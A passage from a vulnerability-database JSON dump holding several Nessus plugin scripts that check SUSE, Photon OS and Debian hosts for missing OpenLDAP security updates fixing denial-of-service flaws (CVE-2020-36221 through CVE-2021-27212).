SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(147030);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/05\");\n\n script_cve_id(\"CVE-2020-36221\", \"CVE-2020-36222\", \"CVE-2020-36223\", \"CVE-2020-36224\", \"CVE-2020-36225\", \"CVE-2020-36226\", \"CVE-2020-36227\", \"CVE-2020-36228\", \"CVE-2020-36229\", \"CVE-2020-36230\", \"CVE-2021-27212\");\n script_xref(name:\"IAVB\", value:\"2021-B-0014\");\n\n script_name(english:\"SUSE SLES12 Security Update : openldap2 (SUSE-SU-2021:0692-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for openldap2 fixes the following issues :\n\nbsc#1182408 CVE-2020-36230 - an assertion failure in slapd in the\nX.509 DN parsing in decode.c ber_next_element, resulting in denial of\nservice.\n\nbsc#1182411 CVE-2020-36229 - ldap_X509dn2bv crash in the X.509 DN\nparsing in ad_keystring, resulting in denial of service.\n\nbsc#1182412 CVE-2020-36228 - integer underflow leading to crash in the\nCertificate List Exact Assertion processing, resulting in denial of\nservice.\n\nbsc#1182413 CVE-2020-36227 - infinite loop in slapd with the\ncancel_extop Cancel operation, resulting in denial of service.\n\nbsc#1182416 CVE-2020-36225 - double free and slapd crash in the\nsaslAuthzTo processing, resulting in denial of service.\n\nbsc#1182417 CVE-2020-36224 - invalid pointer free and slapd crash in\nthe saslAuthzTo processing, resulting in denial of service.\n\nbsc#1182415 CVE-2020-36226 - memch->bv_len miscalculation and slapd\ncrash in the saslAuthzTo processing, resulting in denial of service.\n\nbsc#1182419 CVE-2020-36222 - assertion failure in slapd in the\nsaslAuthzTo validation, resulting in denial of service.\n\nbsc#1182420 CVE-2020-36221 - slapd crashes in the Certificate Exact\nAssertion processing, resulting in denial of service (schema_init.c\nserialNumberAndIssuerCheck).\n\nbsc#1182418 CVE-2020-36223 - slapd crash in the Values Return Filter\ncontrol handling, resulting in denial of service (double free and\nout-of-bounds read).\n\nbsc#1182279 CVE-2021-27212 - an assertion failure in slapd can occur\nin the issuerAndThisUpdateCheck function via a crafted packet,\nresulting in a denial of service (daemon exit) via a short timestamp.\nThis is related to schema_init.c and checkTime.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182416\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1182420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36221/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36222/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36223/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36224/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36225/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36226/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36227/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36228/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36229/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-36230/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2021-27212/\"\n );\n # https://www.suse.com/support/update/announcement/2021/suse-su-20210692-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?38c52bb1\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP5-2021-692=1\n\nSUSE Linux Enterprise Server for SAP 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP4-2021-692=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2021-692=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2021-692=1\n\nSUSE Linux Enterprise Module for Legacy Software 12 :\n\nzypper in -t patch SUSE-SLE-Module-Legacy-12-2021-692=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:compat-libldap-2_3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:compat-libldap-2_3-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"compat-libldap-2_3-0-2.3.37-39.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"compat-libldap-2_3-0-debuginfo-2.3.37-39.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openldap2\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-03-05T19:50:33", "description": "An update of the openldap package has been released.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-03-03T00:00:00", "title": "Photon OS 2.0: Openldap PHSA-2021-2.0-0322", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-27212"], "modified": "2021-03-03T00:00:00", "cpe": ["cpe:/o:vmware:photonos:2.0", "p-cpe:/a:vmware:photonos:openldap"], "id": "PHOTONOS_PHSA-2021-2_0-0322_OPENLDAP.NASL", "href": "https://www.tenable.com/plugins/nessus/147001", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-2.0-0322. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147001);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/04\");\n\n script_cve_id(\"CVE-2021-27212\");\n\n script_name(english:\"Photon OS 2.0: Openldap PHSA-2021-2.0-0322\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openldap package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-322.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27212\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'openldap-2.4.57-2.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'openldap');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-03-05T19:50:34", "description": "An update of the openldap package has been released.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-03-03T00:00:00", "title": "Photon OS 3.0: Openldap PHSA-2021-3.0-0201", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-27212"], "modified": "2021-03-03T00:00:00", "cpe": ["cpe:/o:vmware:photonos:3.0", "p-cpe:/a:vmware:photonos:openldap"], "id": "PHOTONOS_PHSA-2021-3_0-0201_OPENLDAP.NASL", "href": "https://www.tenable.com/plugins/nessus/146999", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0201. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146999);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/04\");\n\n script_cve_id(\"CVE-2021-27212\");\n\n script_name(english:\"Photon OS 3.0: Openldap PHSA-2021-3.0-0201\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openldap package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-201.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27212\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'openldap-2.4.57-2.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'openldap');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-26T10:10:29", "description": "A vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon\ncrash) via specially crafted packets.", "edition": 2, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-02-23T00:00:00", "title": "Debian DSA-4860-1 : openldap - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-27212"], "modified": "2021-02-23T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "p-cpe:/a:debian:debian_linux:openldap"], "id": "DEBIAN_DSA-4860.NASL", "href": "https://www.tenable.com/plugins/nessus/146786", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4860. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(146786);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/25\");\n\n script_cve_id(\"CVE-2021-27212\");\n script_xref(name:\"DSA\", value:\"4860\");\n\n script_name(english:\"Debian DSA-4860-1 : openldap - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon\ncrash) via specially crafted packets.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/openldap\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/openldap\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4860\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the openldap packages.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 2.4.47+dfsg-3+deb10u6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"ldap-utils\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libldap-2.4-2\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libldap-common\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"libldap2-dev\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"slapd\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"slapd-contrib\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"slapd-smbk5pwd\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"slapi-dev\", reference:\"2.4.47+dfsg-3+deb10u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-02-25T17:50:27", "description": "A vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon\ncrash) via specially crafted packets.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2.4.44+dfsg-5+deb9u8.\n\nWe recommend that you upgrade your openldap packages.\n\nFor the detailed security status of openldap please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 3, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2021-02-22T00:00:00", "title": "Debian DLA-2574-1 : openldap security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-27212"], "modified": "2021-02-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ldap-utils", "p-cpe:/a:debian:debian_linux:slapd", "p-cpe:/a:debian:debian_linux:libldap-common", "p-cpe:/a:debian:debian_linux:libldap-2.4-2-dbg", "p-cpe:/a:debian:debian_linux:libldap2-dev", "p-cpe:/a:debian:debian_linux:libldap-2.4-2", "p-cpe:/a:debian:debian_linux:slapd-smbk5pwd", "p-cpe:/a:debian:debian_linux:slapd-dbg", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2574.NASL", "href": "https://www.tenable.com/plugins/nessus/146667", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2574-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(146667);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/24\");\n\n script_cve_id(\"CVE-2021-27212\");\n\n script_name(english:\"Debian DLA-2574-1 : openldap security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability in the Certificate List Exact Assertion validation was\ndiscovered in OpenLDAP, a free implementation of the Lightweight\nDirectory Access Protocol. An unauthenticated remote attacker can take\nadvantage of this flaw to cause a denial of service (slapd daemon\ncrash) via specially crafted packets.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2.4.44+dfsg-5+deb9u8.\n\nWe recommend that you upgrade your openldap packages.\n\nFor the detailed security status of openldap please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/02/msg00035.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/openldap\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/openldap\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27212\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ldap-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libldap-2.4-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libldap-2.4-2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libldap-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libldap2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:slapd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:slapd-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:slapd-smbk5pwd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n 